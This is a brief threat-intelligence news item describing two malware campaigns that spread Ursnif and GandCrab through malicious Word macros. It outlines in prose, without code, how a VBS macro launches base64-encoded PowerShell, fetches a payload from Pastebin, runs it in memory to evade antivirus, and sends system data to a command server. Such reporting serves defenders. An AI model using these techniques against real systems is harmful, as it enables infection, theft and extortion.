#22 - Two new malware campaigns appear that are spread through MS Word macros

Discovered two new malware campaigns, one of which distributes the Ursnif Trojan, while the other, in addition to spreading the same malware, infects the target with the GandCrab ransomware.

Although both campaigns seem to be the work of groups of separate cybercriminals, there are many similarities in how they operate.

Both attacks start with e-mails in which they impersonate an acquaintance to attach a Microsoft Word document. This document contains malicious VBS macros that use Powershell to run their payload and infect the target.

Infection of Ursnif & GandCrab:

As we have explained, the MS Word document contains a malicious macro in VBS. If it is executed successfully, it makes use of Powershell to download and run both Ursnif and GandCrab on infected systems.

The first payload is a Powershell line elbowed in base64 which evaluates the architecture of the target system and, depending on it, downloads an additional load of Pastebin. This runs in memory to bypass common antivirus.

Finally, the payload installs a variant of the GandCrab ransomware in the victim's system, blocking it until it pays the relevant ransom.

Ursnif infection:

Like the previously mentioned malware, it makes use of VBS macros over a malicious Word document to start the infection.

In this case, once it has run, the malware will collect system information, place it in a CAB file and send it to your C & C through an HTTPS connection.